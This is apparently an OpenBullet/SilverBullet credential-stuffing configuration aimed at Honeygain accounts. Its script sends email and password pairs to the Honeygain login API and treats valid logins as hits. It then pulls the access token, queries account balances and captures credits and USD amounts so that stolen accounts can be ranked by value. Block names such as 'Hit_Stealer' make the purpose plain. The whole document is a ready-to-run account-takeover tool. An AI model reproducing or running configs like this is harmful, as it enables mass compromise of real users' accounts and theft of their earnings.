[SETTINGS]
{
  "Name": "Honeygain",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-21T12:49:55.6021592+01:00",
  "AdditionalInfo": "g",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "HoneyGain",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Hit_Stealer REQUEST POST "https://dashboard.honeygain.com/api/v1/users/tokens" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "origin: https://dashboard.honeygain.com" 
  HEADER "referer: https://dashboard.honeygain.com/login" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Bearer <auth>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "not_valid_login_credentials" 
    KEY "Bad credentials" 
  KEYCHAIN Success OR 
    KEY "\"meta\":null,\"data\"" 

#token PARSE "<SOURCE>" LR "\"access_token\":\"" "\"}}" -> VAR "token" 

#auth FUNCTION Constant "<token>" -> VAR "auth" 

#fuk_leecher REQUEST GET "https://dashboard.honeygain.com/api/v1/users/balances" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "origin: https://dashboard.honeygain.com" 
  HEADER "referer: https://dashboard.honeygain.com/login" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Bearer <auth>" 

#credits PARSE "<SOURCE>" LR "\"payout\":{\"credits\":" "," CreateEmpty=FALSE -> CAP "credits" 

#usd PARSE "<SOURCE>" LR "\"usd_cents\":" "}" Recursive=TRUE -> VAR "usd" 

#HIT_LOGGER FUNCTION Constant "<usd[1]>" -> CAP "USD" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<credits>" LessThanOrEqual "15000" 
    KEY "<usd>" LessThanOrEqual "500" 
  KEYCHAIN Success OR 
    KEY "<credits>" GreaterThan "15000" 

